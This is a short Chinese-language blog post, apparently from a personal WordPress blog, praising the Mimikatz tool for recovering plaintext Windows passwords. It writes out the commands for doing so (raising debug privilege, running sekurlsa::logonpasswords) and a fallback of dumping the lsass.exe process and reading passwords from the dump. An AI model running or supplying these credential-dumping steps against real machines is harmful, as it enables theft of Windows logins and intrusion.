momo zone

调核人的blog

windows Mimikatz hack神器

一个法国的牛X人物写的hack工具,它竟然可以dump出明文的windows密码,在我印象中windows密码同样是散列的,不可能还原明文……

另外它也是个windows下的注入调试工具。不过我也就试了试密码破解…….

用法:

step1:

privilege::debug   (进行提权)

step2:

sekurlsa::logonpasswords

…….好像什么东西泄露了

如果提权操作返回错误可以使用任务管理器对lsass.exe进行转储,然后在mimikatz中先执行sekurlsa::minidump lsass.dmp,再执行sekurlsa::logonPasswords full也能看到密码明文

Advertisements

发表评论

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / 更改 )

Twitter picture

You are commenting using your Twitter account. Log Out / 更改 )

Facebook photo

You are commenting using your Facebook account. Log Out / 更改 )

Google+ photo

You are commenting using your Google+ account. Log Out / 更改 )

Connecting to %s

%d 博主赞过: